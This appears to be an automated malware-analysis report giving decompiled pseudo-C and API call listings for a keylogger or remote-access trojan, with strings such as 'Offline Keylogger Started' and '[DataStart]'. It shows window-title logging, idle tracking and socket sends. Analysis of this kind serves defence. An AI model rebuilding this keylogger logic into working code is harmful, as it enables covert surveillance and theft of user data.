                                                                                					_t93 = _t42;
                                                                                					_t43 = GetWindowTextLengthA(_t93);
                                                                                					_t95 = _t43;
                                                                                					_t9 = _t95 + 1; // 0x1
                                                                                					_t45 = _t9;
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t45, 0,  &_v6);
                                                                                					if(_t43 != 0) {
                                                                                						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                                                                						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                						GetWindowTextA(_t93, _t45, _t45);
                                                                                						_t58 =  &_v44;
                                                                                						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t58, 0x41b998);
                                                                                						if(_t58 == 0) {
                                                                                							_t59 =  &_v44;
                                                                                							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t59);
                                                                                							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                                                                							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t59 - 1);
                                                                                							_t112 =  *0x41b93e; // 0x0
                                                                                							if(_t112 == 0) {
                                                                                								_t103 = _t99 - 0x10;
                                                                                								L00414176();
                                                                                								L00414170();
                                                                                								_t99 = _t99 - 0x10 + 0x18;
                                                                                								E004054E9(_v12, _t103,  &_v60,  &_v60, "\r\n[ ",  &_v44);
                                                                                								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
                                                                                							} else {
                                                                                								_t99 = _t99 - 0x10;
                                                                                								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                								E00405DD3(_v12,  &_v44);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_t94 = _v12;
                                                                                					_t71 = _t94; // executed
                                                                                					E00406C35(_t94); // executed
                                                                                					if(E0041269B(_t94) < 0xea60) {
                                                                                						L16:
                                                                                						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                						continue;
                                                                                					} else {
                                                                                						while( *((intOrPtr*)(_t94 + 0x3c)) != 0 ||  *((intOrPtr*)(_t94 + 0x3d)) != 0) {
                                                                                							_t48 = E0041269B(_t71);
                                                                                							if(_t48 < 0xea60) {
                                                                                								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);
                                                                                								_t101 = _t99 + 0xc - 0x10;
                                                                                								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
                                                                                								L00414176();
                                                                                								L00414170();
                                                                                								_t99 = _t99 + 0xc - 0x10 + 0x18;
                                                                                								E004054E9(_t94, _t101,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
                                                                                								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                								goto L16;
                                                                                							}
                                                                                							_v16 = _t48;
                                                                                							Sleep(0x3e8);
                                                                                						}
                                                                                						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                						break;
                                                                                					}
                                                                                				}
                                                                                				return 0;
                                                                                			}

























                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004059F6
                                                                                • Sleep.KERNELBASE(000001F4), ref: 00405A0C
                                                                                • GetForegroundWindow.USER32 ref: 00405A12
                                                                                • GetWindowTextLengthA.USER32(00000000), ref: 00405A1B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 00405A2F
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A40
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405A4A
                                                                                • GetWindowTextA.USER32 ref: 00405A52
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B998), ref: 00405A61
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00405A76
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A7F
                                                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00405A8A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405AA1
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ],?,?,00000000), ref: 00405AC9
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ],?,?,00000000), ref: 00405AD3
                                                                                  • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                                                                  • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                                                                  • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                                                                  • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405AE6
                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?, ],?,?,00000000), ref: 00405B27
                                                                                • _itoa.MSVCRT ref: 00405B3D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B5C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B6C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405B76
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B88
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B91
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B9A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405BA8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@$D@1@@V01@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                                                                • String ID: [ ${ User has been idle for $ ]$ minutes }
                                                                                • API String ID: 615312007-3343415809
                                                                                • Opcode ID: b2b161cc20482a4f6dfc5dc17bce99b28862113886b793a756a1a3e48b86c345
                                                                                • Instruction ID: 24516c956339191e20f1f3c27382aafae9a0e704c06eebb7e5bf761840e1d674
                                                                                • Opcode Fuzzy Hash: b2b161cc20482a4f6dfc5dc17bce99b28862113886b793a756a1a3e48b86c345
                                                                                • Instruction Fuzzy Hash: CC517072900609EBCB00EBA0DC899EF7F78EF44315F04407AE502E7191EB785989CFA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 00402291
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,00018C06), ref: 00402302
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402363
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040236D
                                                                                • CreateThread.KERNELBASE(00000000,00000000,?,0041BE70,00000000,00000000), ref: 0040237E
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402389
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00402392
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040D2B5,00018C06), ref: 004023A7
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023B1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023BA
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023C3
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023D5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@CloseD@1@@EventHandleObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3745950881-0
                                                                                • Opcode ID: dbeee884fd776cfbec01fd867003cada5b731346b54ac5527932367327d62816
                                                                                • Instruction ID: 9121e1d36d2ed1e5780a03bc3f6ba97c1b97061ac4fd9a6be39e0f6b7c1c719d
                                                                                • Opcode Fuzzy Hash: dbeee884fd776cfbec01fd867003cada5b731346b54ac5527932367327d62816
                                                                                • Instruction Fuzzy Hash: 0451FD7250060EEFCB049FA0DD88CEEBB78FF84355B00806AF916A71A0DB745985CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                                                                • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                                                                • #19.WS2_32(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024BB
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                                                                • #19.WS2_32(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024FF
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                                                                • String ID: [DataStart]
                                                                                • API String ID: 2152988250-3852763199
                                                                                • Opcode ID: b7ddc22c15d8914d1f1c813683a48672bd5c42295628cced952c29d7fd2a43a5
                                                                                • Instruction ID: 4f95a53d81068631c3648da1c5498cf22458e2818172e99049c3d90a1b667ab5
                                                                                • Opcode Fuzzy Hash: b7ddc22c15d8914d1f1c813683a48672bd5c42295628cced952c29d7fd2a43a5
                                                                                • Instruction Fuzzy Hash: 7621EA72500509EBCB05DF90DD599EE7778EB98342F108176E907A61E0DB705E44CFA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(override,00000000), ref: 00409D63
                                                                                  • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                                                                  • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                                                                  • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409D96
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409DB3
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409DC6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409DDC
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409DE5
                                                                                • Sleep.KERNELBASE(00000BB8), ref: 00409DFA
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409E11
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409E2E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409E41
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409E57
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409E60
                                                                                • exit.MSVCRT ref: 00409E77
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@D@1@@V01@@$CloseOpenQuerySleepValueexit
                                                                                • String ID: 2.7.2 Pro$override$pth_unenc
                                                                                • API String ID: 3602623569-3893205188
                                                                                • Opcode ID: 66a132f25811430172b3037b5f7f4ac2c14d205858bba7e1f82af523167656d2
                                                                                • Instruction ID: 2889bc0b5ca8399aadfd957be20fb2b9bea035d2a19627ad42be5e9aadac3fca
                                                                                • Opcode Fuzzy Hash: 66a132f25811430172b3037b5f7f4ac2c14d205858bba7e1f82af523167656d2
                                                                                • Instruction Fuzzy Hash: 2E31B772A50604BBD70477E59C4AEFE776DEF84740F44002AF911971D1DFB8498187AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00018C06), ref: 00412A90
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A9A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AA3
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                                                                • String ID:
                                                                                • API String ID: 3435050692-0
                                                                                • Opcode ID: 6fc9868ad885f7efbe2d5dc381eda5900ba348297c01df250700560d4c3f1b65
                                                                                • Instruction ID: d00c3f8f62f9657134ffe5fc931faad8ab4b4020c85508924df81fb6bcd52547
                                                                                • Opcode Fuzzy Hash: 6fc9868ad885f7efbe2d5dc381eda5900ba348297c01df250700560d4c3f1b65
                                                                                • Instruction Fuzzy Hash: F631BB7250050EEBCB04EFA0E959CDE7778EF94745B108066F812E7160EB74AB49CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 26%
                                                                                			E00405180(void* __ecx, char _a4) {
                                                                                				char _v5;
                                                                                				char _v6;
                                                                                				void* _t14;
                                                                                				void* _t18;
                                                                                				void* _t19;
                                                                                				void* _t29;
                                                                                				void* _t32;
                                                                                				char* _t33;
                                                                                				void* _t36;
                                                                                
                                                                                				_t19 = __ecx;
                                                                                				 *((char*)(__ecx + 0x3c)) = 1;
                                                                                				__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z( &_a4, _t29, _t32, _t18, __ecx);
                                                                                				E00405156(__ecx);
                                                                                				_t33 = "Offline Keylogger Started";
                                                                                				if( *0x41b154 != 0x32) {
                                                                                					_t36 = _t36 - 0x10;
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
                                                                                					E00405DD3(__ecx);
                                                                                				}
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("[INFO]",  &_v6);
                                                                                				E0041203B();
                                                                                				CreateThread(0, 0, E0040528A, _t19, 0, 0); // executed
                                                                                				if( *_t19 == 0) {
                                                                                					CreateThread(0, 0, E0040526A, _t19, 0, 0); // executed
                                                                                				}
                                                                                				_t14 = CreateThread(0, 0, E00405299, _t19, 0, 0); // executed
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				return _t14;
                                                                                			}













                                                                                APIs
